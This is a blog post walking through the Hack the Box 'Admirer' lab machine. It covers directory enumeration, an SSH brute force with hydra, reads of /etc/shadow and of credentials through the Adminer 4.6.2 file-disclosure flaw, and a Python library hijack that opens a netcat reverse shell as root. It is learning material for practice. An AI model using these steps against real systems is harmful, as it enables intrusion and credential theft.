<!DOCTYPE html>
<html lang="en" dir=>

<head>
  <meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<meta name="description" content="This was one of the first boxes I completed and it was difficult. It took me the longest time to enumerate the directories and finally find what I was looking for. Overall, I learned more about using my resources and double checking where I had thought I already looked.">
<meta name="theme-color" content="#FFFFFF"><meta property="og:title" content="Admirer" />
<meta property="og:description" content="This was one of the first boxes I completed and it was difficult. It took me the longest time to enumerate the directories and finally find what I was looking for. Overall, I learned more about using my resources and double checking where I had thought I already looked." />
<meta property="og:type" content="article" />
<meta property="og:url" content="https://stefantobler.com/posts/hack-the-box/admirer/" />
<meta property="article:published_time" content="2020-06-11T00:00:00+00:00" />
<meta property="article:modified_time" content="2020-06-11T00:00:00+00:00" />
<title>Admirer | Stefan Tobler</title>
<link rel="manifest" href="/manifest.json">
<link rel="icon" href="/favicon.png" type="image/x-icon">
<link rel="stylesheet" href="/book.min.6cd8553a6854f4812343f0f0c8baca31271e686434f381fbe3c7226f66639176.css" integrity="sha256-bNhVOmhU9IEjQ/DwyLrKMSceaGQ084H748cib2ZjkXY=">
<script defer src="/en.search.min.24f8f40c2756168e54d3c52c27896d20a0bdf40f75067c6dc1577730a766787f.js" integrity="sha256-JPj0DCdWFo5U08UsJ4ltIKC99A91BnxtwVd3MKdmeH8="></script>

<script type="application/javascript">
var doNotTrack = false;
if (!doNotTrack) {
	window.ga=window.ga||function(){(ga.q=ga.q||[]).push(arguments)};ga.l=+new Date;
	ga('create', 'UA-158607018-1', 'auto');
	
	ga('send', 'pageview');
}
</script>
<script async src='https://www.google-analytics.com/analytics.js'></script>
<!--
Made with Book Theme
https://github.com/alex-shpak/hugo-book
-->

  
<link rel="stylesheet" href="/assets/css/posts.css" />

</head>

<body dir=>
  <input type="checkbox" class="hidden toggle" id="menu-control" />
  <input type="checkbox" class="hidden toggle" id="toc-control" />
  <main class="container flex">
    <aside class="book-menu">
      
  <nav>
<h2 class="book-brand">
  <a href="/"><img src="/images/logo.png" alt="Logo" /><span>Stefan Tobler</span>
  </a>
</h2>


<div class="book-search">
  <input type="text" id="book-search-input" placeholder="Search" aria-label="Search" maxlength="64" data-hotkeys="s/" />
  <div class="book-search-spinner hidden"></div>
  <ul id="book-search-results"></ul>
</div>



<span><a href='https://stefantobler.com/posts/'>Recent Posts</a></span>







  



  
  
  
  

  
  <ul>
    
      
        <li>
          
  
    <a href="https://stefantobler.com/categories/hack-the-box">Hack the Box</a>
  

          
  
  
  

  
  <ul>
    
      
        <li>
          
  
    <a href="https://stefantobler.com/categories/challenges">Challenges</a>
  

          
  
  
  

  
  <ul>
    
      
        <li>
          
  
    <a href="/posts/hack-the-box/challenges/fuzzy/" class="">Fuzzy</a>
  

        </li>
      
    
  </ul>
  

        </li>
      
    
      
        <li>
          
  
    <a href="/posts/hack-the-box/archetype/" class="">Archetype</a>
  

        </li>
      
    
      
        <li>
          
  
    <a href="/posts/hack-the-box/magic/" class="">Magic</a>
  

        </li>
      
    
      
        <li>
          
  
    <a href="/posts/hack-the-box/remote/" class="">Remote</a>
  

        </li>
      
    
      
        <li>
          
  
    <a href="/posts/hack-the-box/traceback/" class="">Traceback</a>
  

        </li>
      
    
      
        <li>
          
  
    <a href="/posts/hack-the-box/admirer/" class="active">Admirer</a>
  

        </li>
      
    
  </ul>
  

        </li>
      
    
      
        <li>
          
  
    <a href="https://stefantobler.com/categories/try-hack-me">Try Hack Me</a>
  

          
  
  
  

  
  <ul>
    
      
        <li>
          
  
    <a href="/posts/try-hack-me/basic-pentesting/" class="">Basic Pentesting</a>
  

        </li>
      
    
      
        <li>
          
  
    <a href="/posts/try-hack-me/blue/" class="">Blue</a>
  

        </li>
      
    
      
        <li>
          
  
    <a href="/posts/try-hack-me/ice/" class="">Ice</a>
  

        </li>
      
    
      
        <li>
          
  
    <a href="/posts/try-hack-me/vulnversity/" class="">Vulnversity</a>
  

        </li>
      
    
      
        <li>
          
  
    <a href="/posts/try-hack-me/shodan.io/" class="">Shodan.io</a>
  

        </li>
      
    
  </ul>
  

        </li>
      
    
      
        <li>
          
  
    <a href="https://stefantobler.com/categories/capture-the-flag">Capture the Flag</a>
  

          
  
  
  

  
  <ul>
    
      
        <li>
          
  
    <a href="/posts/ctf/nahamcon_2021/" class="">Nahamcon 2021 CTF</a>
  

        </li>
      
    
  </ul>
  

        </li>
      
    
      
        <li>
          
  
    <a href="https://stefantobler.com/categories/misc">Misc</a>
  

          
  
  
  

  
  <ul>
    
      
        <li>
          
  
    <a href="/posts/misc/docker-containerization-vs-virtualization/" class="">Docker - Containerization vs. Virtualization</a>
  

        </li>
      
    
      
        <li>
          
  
    <a href="/posts/misc/virtualbox-tutorial/" class="">How to Install Kali Linux on VirtualBox</a>
  

        </li>
      
    
  </ul>
  

        </li>
      
    
  </ul>
  















</nav>




  <script>(function(){var menu=document.querySelector("aside.book-menu nav");addEventListener("beforeunload",function(event){localStorage.setItem("menu.scrollTop",menu.scrollTop);});menu.scrollTop=localStorage.getItem("menu.scrollTop");})();</script>


 
    </aside>

    <div class="book-page">
      <header class="book-header">
        
  <div class="flex align-center justify-between">
  <label for="menu-control">
    <img src="/svg/menu.svg" class="book-icon" alt="Menu" />
  </label>

  <strong>Admirer</strong>

  <label for="toc-control">
    
    <img src="/svg/toc.svg" class="book-icon" alt="Table of Contents" />
    
  </label>
</div>


  
  <aside class="hidden clearfix">
    
  <nav id="TableOfContents">
  <ul>
    <li><a href="#tools">Tools</a></li>
    <li><a href="#walkthrough">Walkthrough</a></li>
  </ul>
</nav>


  </aside>
  
 
      </header>

      
      

<div class="post-hero-container">
  <img class="card-img-top" src='/images/content/posts/hack-the-box/admirer.png'/>
</div>

<article class="markdown">
  <h1>
    <a href="/posts/hack-the-box/admirer/">Admirer</a>
  </h1>
  
  
  <div>
    
      <a href="/categories/hack-the-box/">hack-the-box</a>
  </div>
  

  
  <div>
    
      <a href="/tags/linux/">linux</a>, 
      <a href="/tags/enumeration/">enumeration</a>, 
      <a href="/tags/sql/">sql</a>, 
      <a href="/tags/adminer/">adminer</a>
  </div>
  


  <p><p>This was one of the first boxes I completed and it was difficult. It took me the longest time to enumerate the directories and finally find what I was looking for. Overall, I learned more about using my resources and double checking where I had thought I already looked. Good luck to all who want to try this box!</p>
<h2 id="tools">
  Tools
  <a class="anchor" href="#tools">#</a>
</h2>
<ul>
<li>nmap</li>
<li>firefox</li>
<li>gobuster</li>
<li>nikto</li>
<li>hydra</li>
<li>netcat</li>
<li>python</li>
<li>mysql</li>
</ul>
<h2 id="walkthrough">
  Walkthrough
  <a class="anchor" href="#walkthrough">#</a>
</h2>
<p>First thing&rsquo;s first, let&rsquo;s do the <code>nmap</code> scan. I use the command <code>sudo nmap -sS -sV $IP</code>.</p>
<pre><code>Starting Nmap 7.80 ( https://nmap.org ) at 2020-06-11 17:04 EDT
Nmap scan report for 10.10.10.187
Host is up (0.056s latency).
Not shown: 997 closed ports
PORT   STATE SERVICE VERSION
21/tcp open  ftp     vsftpd 3.0.3
22/tcp open  ssh     OpenSSH 7.4p1 Debian 10+deb9u7 (protocol 2.0)
80/tcp open  http    Apache httpd 2.4.25 ((Debian))
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 7.99 seconds
</code></pre><p>As usual for HTB machines there is a web server on port 80 and <code>SSH</code> is open. Let&rsquo;s start looking around. While we are looking at the webpage I am going to run a <code>gobuster</code> scan in the background with the command <code>gobuster dir -u http://$IP -w /usr/share/dirb/wordlists/common.txt</code>.</p>
<p>While looking at the website I went to <code>robots.txt</code> and found out that there is a directory called <code>/admin-dir</code>. This is something we should checkout. If we try and navigate to the directory, we are not allowed to view it, that&rsquo;s okay, we will get there eventually! Let&rsquo;s see the output of our <code>gobuster</code> scan.</p>
<p>Looks like we didn&rsquo;t find too much we didn&rsquo;t already know.</p>
<pre><code>===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) &amp; Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url:            http://10.10.10.187
[+] Threads:        10
[+] Wordlist:       /usr/share/dirb/wordlists/common.txt
[+] Status codes:   200,204,301,302,307,401,403
[+] User Agent:     gobuster/3.0.1
[+] Timeout:        10s
===============================================================
2020/06/11 17:12:10 Starting gobuster
===============================================================
/.hta (Status: 403)
/.htaccess (Status: 403)
/.htpasswd (Status: 403)
/assets (Status: 301)
/images (Status: 301)
/index.php (Status: 200)
/robots.txt (Status: 200)
/server-status (Status: 403)
===============================================================
2020/06/11 17:12:36 Finished
===============================================================
</code></pre><p>I am going to run another <code>gobuser</code> scan and I added the argument <code>-x .php,.txt,.html</code> so that I can look for file extensions. Again no results, so I am going to try one more time with the wordlist <code>/usr/share/dirbuster/wordlists/directory-list-lowercase-2.3-small.txt</code>. This list is over 20 times larger than the last one. I might be beating a dead horse here but hopefully something interesting will pop up.</p>
<p>Okay so I am back after a while and I have a new idea. I am trying to enumerate the home directory, but what about the directory that we had found earlier. Let&rsquo;s try to use the command <code>gobuster dir -u http://$IP/admin-dir/ -w /usr/share/dirb/wordlists/common.txt -x .php,.txt,.html</code>. We found something new! It looks like there is something at the domain <code>http://$IP/admin-dir/contacts.txt</code>. It even gives us a 200 response code so we should be able to view its contents. Look&rsquo;s like it has the names and email addresses of designers and developers of the <code>admirer</code> app. This might help us brute force an <code>ssh</code> login. Let&rsquo;s try using <code>hydra</code> on a set of usernames that include the names we found in the file. Here is the command I used <code>hydra -L usernames.txt -P /usr/share/wordlists/rockyou.txt $IP ssh</code>.</p>
<p>While waiting for <code>hydra</code> to run I also tried an anonymous <code>ftp</code> login but I just got permission denied. Also if we don&rsquo;t find any <code>ssh</code> credentials we could always try hydra on <code>ftp</code>. Wait a second&hellip; haha I am such a fool. I bet the <code>ssh</code> and <code>ftp</code> passwords are the same. So if I can&rsquo;t brute force <code>ssh</code> the I probably will not be able to use <code>hydra</code> on <code>ftp</code>. While waiting for <code>hydra</code> and another <code>gobuster</code> scan to be completed, I stumbled upon the HTB fourms and read a few posts about this box. There was a hint about this box&rsquo;s name being similar to that of a database, so I did a quick google search and found <a href="https://www.adminer.org/">this</a> link. There is a database called <code>adminer</code>. That is pretty similar to the name of our box. Let&rsquo;s read up some more about this database and maybe do some manual enumeration.</p>
<p>After trying a few different paths from <code>adminer</code>'s GitHub page I didn&rsquo;t find much.</p>
<pre><code>
adminer/index.php - Run development version of Adminer
editor/index.php - Run development version of Adminer Editor
editor/example.php - Example customization
plugins/readme.txt - Plugins for Adminer and Adminer Editor
adminer/plugin.php - Plugin demo
adminer/sqlite.php - Development version of Adminer with SQLite allowed
editor/sqlite.php - Development version of Editor with SQLite allowed
adminer/designs.php - Development version of Adminer with adminer.css switcher
compile.php - Create a single file version
lang.php - Update translations
tests/katalon.html - Katalon Automation Recorder test suite
</code></pre><p>This is a list of the ones I tried. I also started a <code>nikto</code> scan using the command <code>nikto -host http://$IP</code>. My <code>nikto</code> scan didn&rsquo;t show much, a little disappointing. However, we got a new file from another <code>gobuster</code> scan. I used the command <code>gobuster dir -u http://$IP/admin-dir/ -w /usr/share/dirbuster/wordlists/directory-list-lowercase-2.3-medium.txt -x .php,.txt,.html</code>. It took quite a while, but I found the file <code>/admin-dir/credentials.txt</code>. It looks like it has some WP credentials, <code>ftp</code> credentials and some email credentials. Let&rsquo;s see what the <code>ftp</code> login gets us.</p>
<p>After trying to log in we are successful, awesome! There is a database dump and some compressed file, let&rsquo;s exfiltrate both of them so we can take a look around. We were stuck in the home directory of the <code>ftpuser</code>, so this is all we could get.</p>
<p>In the <code>html.tar.gz</code> folder we got all the contents on the website. You can find the ungziped version in the directory <code>html</code>. I found some interesting file in the directory <code>utility-scripts</code>. There are some <code>.php</code> files having to do with administrator privileges, so let&rsquo;s investigate those in the web browser and see if we can access them.</p>
<p>Something I found in the <code>utility-scripts/info.php</code> file that I think is funny is that it says <code>Adminer</code> version 4.9 is running, but on the <code>Adminer</code> GitHub page the latest version is 4.7. We can also access the page <code>utility-scripts/admin_tasks.php</code> on the website. This might be a lead! From this page we can see that there is a user named <code>waldo</code> logged into the machine. This person also appeared on the credentials page exfiltrated from the <code>ftp</code> server. Let&rsquo;s see if we can <code>ssh</code> into the machine on the user <code>waldo</code> with any of the credentials we found. Ouch and after trying the server with all the passwords we have found so far we are not lucky. I guess it is time to look at <code>dump.sql</code>.</p>
<p>Well another disappointing lead, it looks like the <code>dump.sql</code> file just contains the descriptors for the images on the server. Boo hoo.</p>
<p>What&rsquo;s strange is that of all the files that we exfiltrated from the <code>utility-scripts</code> directory the only file that does not exist is <code>db_admin.php</code>. I don&rsquo;t know the significance, but it is something to note.</p>
<p>Okay so I finally found something interesting. I used <code>ffuf -u http://$IP/utility_scripts/FUZZ -w /usr/share/dirb/wordlists/big.txt -e .php,.txt,.html</code>. This popped up that there is a file called <code>adminer.php</code>. This gives us a login page. I am not sure what the DB stuff means, but we can try and use the credentials we have found in hopes that we can use something. I tried using the credentials <code>waldo::Wh3r3_1s_w4ld0?</code> but didn&rsquo;t have any luck. However at the top of the page there is a version number: 4.6.2. This is not the most recent version so let&rsquo;s look up some exploits. Turns out that this version of adminer has a big file disclosure vulnerability. You can read about it <a href="https://sansec.io/research/adminer-4.6.2-file-disclosure-vulnerability">here</a> and <a href="https://www.foregenix.com/blog/serious-vulnerability-discovered-in-adminer-tool">here</a>.</p>
<p>I have been having a lot of trouble starting my <code>mysql</code> server on my machine. I wasn&rsquo;t able to connect for a while. However here is what I figured out.</p>
<p>Use the command <code>sudo service mysql start</code> to start the server. Next use the command <code>sudo mysql</code> to connect to the <code>mysql</code> shell. Now here goes a series of commands.</p>
<pre><code>CREATE DATABASE admirer;
use admirer;
CREATE USER 'htb'@'%' IDENTIFIED BY 'hacker';
GRANT ALL PRIVILEGES ON * . * TO 'htb'@'%';
FLUSH PRIVILEGES;
CREATE TABLE test(data VARCHAR(255));
</code></pre><p>Now that we have user and it&rsquo;s privileges set we need to set the <code>bind-address</code> to 0.0.0.0 in <code>/etc/mysql/mariadb.conf.d/50-server.cnf</code>.</p>
<p>Now that this is all set we can connect to our server on the login page by filling out the following information.</p>
<pre><code>Server: 10.10.14.22 (this your internal htb ip, find it on the Access page)
username: htb
password: hacker
database: adminer
</code></pre><p>Then boom we connect. We have come a long way to get this far! So close to user I can feel it. Now we need to try and exfiltrate the user&rsquo;s password. Let&rsquo;s investigate. We can enter SQL commands into this website. So based on the command suggested in the second article, we should be able to use <code>LOAD DATA LOCAL INFILE '/etc/shadow' INTO TABLE test</code>, looks like we are not allowed to view that file&hellip; surprise. Let&rsquo;s try using the query <code>LOAD DATA LOCAL INFILE '../index.php' INTO TABLE test</code> because that is where we found some credentials from the files we got via <code>ftp</code>. This is what we found:</p>
<pre><code>$username = &quot;waldo&quot;;
$password = &quot;&amp;&lt;h5b~yK3F#{PaPB&amp;dA}{H&gt;&quot;;
$dbname = &quot;admirerdb&quot;;
</code></pre><p>If we try using these credentials to <code>ssh</code> into the machine they work! User success. Here is the hash that was on my machine <code>f0c71b0bad8032c9cf59393f1eb7d3e5</code>.</p>
<p>Now to try and escalate to root! Right off the bat I ran the command <code>sudo -l</code> to see what commands <code>waldo</code> could run. We can see that there is a script called <code>admin_tasks.sh</code> if we try and run it we get the same options that were on the web interface. I tried to create a password backup but was unable due to insufficient permissions.</p>
<p>There is also a few backup that have been created. If we do the command <code>find \ | grep .bak | grep .bak</code> the we can find another password backup that has been created. Unfortunately we are not allowed to access this file again. I tried catting out the <code>.bash_history</code> of the users, but it looks like they are all being piped to <code>/dev/null</code>.</p>
<p>Now I downloaded the post exploit script linenum to the server and ran it to see if anything will stand out. I got lenenum from the repo <a href="https://raw.githubusercontent.com/Open-Sec/LinEnum/master/LinEnum.sh">here</a>. Okay&hellip; so I don&rsquo;t really know what I am reading, but nothing really stands out to me. However after doing <code>sudo -l</code> again I realized that I could run the <code>admin_tasks.sh</code> as root. So I can create the <code>passwd.bak</code> file. However I still cannot read it. Let&rsquo;s see if we can alter the code in the shell script. I am silly. My target is not <code>passwd.bak</code> because I can already read it at <code>/etc/passwd</code>.</p>
<p>Right now my idea is to some how abuse the fact that when we do <code>sudo -l</code> that we have something to do with <code>SETENV</code>. I am thinking that we can preserve the <code>EUID</code> that the shell script is executed as. Because we know that we can execute <code>admin_tasks.sh</code> as root. So there has got to be a way that we can maintain the <code>EUID</code> from this process, essentially making us the <code>root</code> user. There is also a call to the file <code>backup.py</code> in our shell script that we have permission to run. Maybe this could be an attack vector as well, because technically the <code>backup.py</code> gets run as root as well. Let&rsquo;s do some research. I found <a href="https://medium.com/@klockw3rk/privilege-escalation-hijacking-python-library-2a0e92a45ca7">this</a> article. It has to do with being able too write to the file that the python module is importing. Let&rsquo;s see if we can locate this <code>shutil.py</code> file. Well it looks like we do not have permission to edit the <code>shutil.py</code> file. But what if we can create our own and make the python file being ran to look there. Let&rsquo;s try this in <code>waldo</code>'s home directory. I would say do it in <code>/tmp</code>, but the machine deletes <code>/tmp</code> frequently so it would be a pain to work in. Okay so let&rsquo;s create a file called <code>shutil.py</code>. In there we need the same method signature that is in the real <code>shutil.py</code> file for the <code>make_archive</code> method. In this method we don&rsquo;t need any of the arguments, we just need the method to be called. So I want to spawn a reverse shell. Here is what I have.</p>
<pre><code>import os
def make_archive(a, b, c):
  os.system(&quot;nc 10.10.14.29 1234 -e'/bin/sh'&quot;)
</code></pre><p>Now from here I thought we could just run the script from this directory, but that is not the case. Turns out that this file needs to be in the python <code>sys.path</code> I tried adding it to the <code>sys.path</code> using some choppy code, but it did not work. Then I read about setting the environmental variable <code>PYTHONPATH</code> to so I set it to <code>/home/waldo</code>. That didn&rsquo;t work either. But after a hint, it turns out that what we need to do is run it all together as SUDO. First set up your listener on your local machine. Here we run the command <code>nc -lvnp 1234</code>, then on the server we need to run the following command: <code>sudo PYTHONPATH=/home/waldo /opt/scripts/admin_tasks.sh</code> then select 6. If you set up your listener on your local machine then it should work. Type <code>whoami</code> on the reverse shell and you are root! Congratulations. Now to cat out the <code>/root/root.txt</code> file. Overall this was a very difficult box for me. I probably worked on it for 8+ hours, but I feel like I learned a lot. Onto the next box!</p>
<pre><code>Working Credentials:
ftpuser::%n?4Wz}R$tTF7
waldo::&amp;&lt;h5b~yK3F#{PaPB&amp;dA}{H&gt;
</code></pre><pre><code>URLS:
|$IP/admin-dir/
||- contacts.txt
||- credentials.txt  
|$IP/utility-scipts/
||- info.php
||- admin_tasks.php
||- phptest.php
||- adminer.php
|$IP/server-status
</code></pre></p>
</article>
 
      

      <footer class="book-footer">
        
  <div class="flex flex-wrap justify-between">





</div>

 
        
      </footer>

      
  
  <div class="book-comments">
<div id="disqus_thread"></div>
<script type="application/javascript">
    var disqus_config = function () {
    
    
    
    };
    (function() {
        if (["localhost", "127.0.0.1"].indexOf(window.location.hostname) != -1) {
            document.getElementById('disqus_thread').innerHTML = 'Disqus comments not available by default when the website is previewed locally.';
            return;
        }
        var d = document, s = d.createElement('script'); s.async = true;
        s.src = '//' + "stefantobler" + '.disqus.com/embed.js';
        s.setAttribute('data-timestamp', +new Date());
        (d.head || d.body).appendChild(s);
    })();
</script>
<noscript>Please enable JavaScript to view the <a href="https://disqus.com/?ref_noscript">comments powered by Disqus.</a></noscript>
<a href="https://disqus.com" class="dsq-brlink">comments powered by <span class="logo-disqus">Disqus</span></a>
</div>
  
 

      <label for="menu-control" class="hidden book-menu-overlay"></label>
    </div>

    
    <aside class="book-toc">
      
  <nav id="TableOfContents">
  <ul>
    <li><a href="#tools">Tools</a></li>
    <li><a href="#walkthrough">Walkthrough</a></li>
  </ul>
</nav>

 
    </aside>
    
  </main>

  
</body>

</html>












